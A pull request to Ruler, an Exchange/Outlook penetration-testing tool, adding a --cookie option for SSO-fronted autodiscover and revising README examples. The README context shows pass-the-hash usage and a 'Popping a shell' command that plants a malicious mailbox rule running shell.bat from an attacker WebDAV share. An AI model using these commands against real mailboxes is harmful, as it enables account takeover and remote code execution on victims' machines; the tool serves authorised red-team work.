### PR TITLE
Cookie

### DIFF
--- a/README.md
+++ b/README.md
@@ -194,12 +194,18 @@ If you run into issues with Authentication (and you know the creds are correct),
 
 The global ```--verbose``` flag will also give you some insight into the process being used by the autodiscover service.
 
+### --domain is not needed
+
+Another interesting thing to note, is that Ruler doesn't require the ```--domain``` for authentication or autodiscover in most cases. The autodiscover service works off the email addresses domain. If you find that authentication is failing, it might mean that you require the internal domain name as part of the authentication string. For this, you will need to add ```--domain DOMAIN``` to your requests. This will ensure that NTLM auth does ```DOMAIN\USERNAME``` in the authentication sequence, instead of ```.\USERNAME```.  
+
+Basic rule, use ```--domain``` with bruteforce (it uses this to figure out the autodiscover URL), otherwise leave it off.
+
 ## PtH - Passing the hash
 
 Ruler has support for PtH attacks, allowing you to reuse valid NTLM hashes (think responder, mimikatz, mana-eap) instead of a password. Simply provide the hash instead of a password and you are good to go. To provide the hash, use the global flag ```--hash```.
 
 ```
-./ruler --domain evilcorp --username validuser --hash 71bc15c57d836a663ed0b02631d300be --email user@domain.com display
+./ruler  --username validuser --hash 71bc15c57d836a663ed0b02631d300be --email user@domain.com display
 ```
 
 ## Display existing rules / verify account
@@ -207,12 +213,12 @@ Ruler has support for PtH attacks, allowing you to reuse valid NTLM hashes (thin
 Once you have a set of credentials you can target the user's mailbox. Here you'll need to know their email address (address book searching is in the planned extension).
 
 ```
-./ruler --domain targetdomain.com --email user@targetdomain.com --username username --password password display
+./ruler  --email user@targetdomain.com --username username --password password display
 ```
 
 Output:
 ```
-./ruler --domain evilcorp.ninja --username john.ford --password August2016 --email john.ford@evilcorp.ninja display
+./ruler  --username john.ford --password August2016 --email john.ford@evilcorp.ninja display
 
 [*] Retrieving MAPI info
 [*] Doing Autodiscover for domain
@@ -230,7 +236,7 @@ Output:
 To delete rules, use the ruleId displayed next to the rule name (000000df1)
 
 ```
-./ruler --domain targetdomain.com --email user@targetdomain.com --username username --password password delete --id 000000df1
+./ruler --email user@targetdomain.com --username username --password password delete --id 000000df1
 ```
 
 # Popping a shell
@@ -240,7 +246,7 @@ Now the fun part. Your initial setup is the same as outlined in the [Silentbreak
 To create the new rule user Ruler and:
 
 ```
-./ruler --domain targetdomain.com --email user@targetdomain.com --username username --password password add --location "\\\\yourserver\\webdav\\shell.bat" --trigger "pop a shell" --name maliciousrule
+./ruler --email user@targetdomain.com --username username --password password add --location "\\\\yourserver\\webdav\\shell.bat" --trigger "pop a shell" --name maliciousrule
 ```
 
 The various parts:

--- a/autodiscover/autodiscover.go
+++ b/autodiscover/autodiscover.go
@@ -77,11 +77,12 @@ func autodiscover(domain string, mapi bool) (*utils.AutodiscoverResp, error) {
 		//create an ntml http client
 		client = http.Client{
 			Transport: &httpntlm.NtlmTransport{
-				Domain:   SessionConfig.Domain,
-				User:     SessionConfig.User,
-				Password: SessionConfig.Pass,
-				NTHash:   SessionConfig.NTHash,
-				Insecure: SessionConfig.Insecure,
+				Domain:    SessionConfig.Domain,
+				User:      SessionConfig.User,
+				Password:  SessionConfig.Pass,
+				NTHash:    SessionConfig.NTHash,
+				Insecure:  SessionConfig.Insecure,
+				CookieJar: SessionConfig.CookieJar,
 			},
 			Jar: SessionConfig.CookieJar,
 		}

--- a/autodiscover/autodiscover.go
+++ b/autodiscover/autodiscover.go
@@ -83,6 +83,7 @@ func autodiscover(domain string, mapi bool) (*utils.AutodiscoverResp, error) {
 				NTHash:   SessionConfig.NTHash,
 				Insecure: SessionConfig.Insecure,
 			},
+			Jar: SessionConfig.CookieJar,
 		}
 	}
 

--- a/http-ntlm/ntlmtransport.go
+++ b/http-ntlm/ntlmtransport.go
@@ -13,7 +13,9 @@ import (
 	"io"
 	"io/ioutil"
 	"net/http"
+	"net/http/cookiejar"
 	"strings"
+	"time"
 
 	"github.com/sensepost/ruler/utils"
 	"github.com/staaldraad/go-ntlm/ntlm"
@@ -21,11 +23,12 @@ import (
 
 // NtlmTransport is implementation of http.RoundTripper interface
 type NtlmTransport struct {
-	Domain   string
-	User     string
-	Password string
-	NTHash   []byte
-	Insecure bool
+	Domain    string
+	User      string
+	Password  string
+	NTHash    []byte
+	Insecure  bool
+	CookieJar *cookiejar.Jar
 }
 
 // RoundTrip method send http request and tries to perform NTLM authentication
@@ -51,7 +54,7 @@ func (t NtlmTransport) RoundTrip(req *http.Request) (res *http.Response, err err
 		TLSClientConfig: &tls.Config{InsecureSkipVerify: t.Insecure},
 	}
 
-	client := http.Client{Transport: tr, Timeout: 0} //time.Minute * 2}
+	client := http.Client{Transport: tr, Timeout: time.Minute * 2, Jar: t.CookieJar}
 	resp, err := client.Do(r)
 
 	if err != nil {

--- a/mapi/mapi.go
+++ b/mapi/mapi.go
@@ -108,11 +108,12 @@ func mapiRequestHTTP(URL, mapiType string, body []byte) ([]byte, error) {
 
 	Client := http.Client{
 		Transport: &httpntlm.NtlmTransport{
-			Domain:   AuthSession.Domain,
-			User:     AuthSession.User,
-			Password: AuthSession.Pass,
-			NTHash:   AuthSession.NTHash,
-			Insecure: AuthSession.Insecure,
+			Domain:    AuthSession.Domain,
+			User:      AuthSession.User,
+			Password:  AuthSession.Pass,
+			NTHash:    AuthSession.NTHash,
+			Insecure:  AuthSession.Insecure,
+			CookieJar: AuthSession.CookieJar,
 		},
 		Jar: AuthSession.CookieJar,
 	}

--- a/mapi/mapi.go
+++ b/mapi/mapi.go
@@ -5,7 +5,6 @@ import (
 	"fmt"
 	"io/ioutil"
 	"net/http"
-	"net/http/cookiejar"
 	"net/url"
 	"regexp"
 	"runtime"
@@ -51,7 +50,7 @@ func ExtractRPCURL(resp *utils.AutodiscoverResp) string {
 func Init(config *utils.Session, lid, URL, ABKURL string, transport int) {
 	AuthSession = config
 	AuthSession.LID = lid
-	AuthSession.CookieJar, _ = cookiejar.New(nil)
+	//AuthSession.CookieJar, _ = cookiejar.New(nil)
 	if transport == HTTP {
 		AuthSession.URL, _ = url.Parse(URL)
 		AuthSession.ABKURL, _ = url.Parse(ABKURL)

--- a/rpc-http/rpctransport.go
+++ b/rpc-http/rpctransport.go
@@ -117,7 +117,9 @@ func setupHTTPNTLM(rpctype string, URL string) (net.Conn, error) {
 		request = fmt.Sprintf("%sContent-Length: 76\r\n", request)
 	}
 	request = fmt.Sprintf("%sAuthorization: NTLM %s\r\n\r\n", request, utils.EncBase64(authenticate.Bytes()))
-
+	if cookiestr != "" {
+		request = fmt.Sprintf("%sCookie: %s\r\n", request, cookiestr)
+	}
 	connection.Write([]byte(request))
 
 	return connection, nil

--- a/rpc-http/rpctransport.go
+++ b/rpc-http/rpctransport.go
@@ -46,6 +46,14 @@ func setupHTTPNTLM(rpctype string, URL string) (net.Conn, error) {
 	request = fmt.Sprintf("%sAccept: application/rpc\r\n", request)
 	request = fmt.Sprintf("%sConnection: keep-alive\r\n", request)
 
+	//add cookies
+	cookiestr := ""
+	for _, c := range AuthSession.CookieJar.Cookies(u) {
+		cookiestr = fmt.Sprintf("%s%s=%s; ", cookiestr, c.Name, c.Value)
+	}
+	if cookiestr != "" {
+		request = fmt.Sprintf("%sCookie: %s\r\n", request, cookiestr)
+	}
 	//we should probably extract the NTLM type from the server response and use appropriate
 	session, err := ntlm.CreateClientSession(ntlm.Version2, ntlm.ConnectionlessMode)
 	b, _ := session.GenerateNegotiateMessage()

--- a/ruler.go
+++ b/ruler.go
@@ -258,7 +258,14 @@ func connect(c *cli.Context) error {
 	if c.GlobalString("cookie") != "" {
 		//split into cookies and then into name : value
 		cookies := strings.Split(c.GlobalString("cookie"), ";")
-		cookieJarTmp := make([]*http.Cookie, len(cookies))
+		var cookieJarTmp []*http.Cookie
+		var cdomain string
+		//split and get the domain from the email
+		if eparts := strings.Split(c.GlobalString("email"), "@"); len(eparts) == 2 {
+			cdomain = eparts[1]
+		} else {
+			return fmt.Errorf("[x] Invalid email address")
+		}
 
 		for _, v := range cookies {
 			cookie := strings.Split(v, "=")
@@ -266,11 +273,12 @@ func connect(c *cli.Context) error {
 				Name:   cookie[0],
 				Value:  cookie[1],
 				Path:   "/",
-				Domain: "outlook.com",
+				Domain: cdomain,
 			}
 			cookieJarTmp = append(cookieJarTmp, c)
 		}
-		config.CookieJar.SetCookies(&url.URL{Path: "outlook.com"}, cookieJarTmp)
+		u, _ := url.Parse(fmt.Sprintf("https://%s/", cdomain))
+		config.CookieJar.SetCookies(u, cookieJarTmp)
 	}
 
 	url := c.GlobalString("url")


### PR DESCRIPTION
This adds a ```--cookie``` flag allowing you to set custom cookies. Idea comes from https://github.com/sensepost/ruler/issues/13 where a SSO solution existed in front of the autodiscover service. Requiring a cookie to be present for duration of the session.

usage:
```
go run ruler.go --password x --email x@outlook.com --cookie "x=blah" display
```

If you want to set multiple cookies use a semi-colon to delimit:

```
go run ruler.go --password x --email x@outlook.com --cookie "x=blah;foo=bar" display
```